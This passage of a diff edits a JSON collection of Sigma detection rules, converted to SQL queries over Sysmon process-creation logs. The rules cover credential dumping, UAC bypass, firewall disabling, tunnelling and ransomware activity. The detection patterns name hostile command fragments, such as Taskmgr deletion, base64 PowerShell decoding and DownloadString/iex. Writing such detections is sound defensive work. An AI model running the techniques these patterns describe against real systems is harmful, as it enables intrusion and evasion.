'\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_plink_susp_tunneling.yml" + }, + { + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", - "author": "frack113", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Legitimate usage of Setres" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "status": "test", + "description": "load malicious registered COM objects", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1486" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Legitimate execution of dxcap.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE 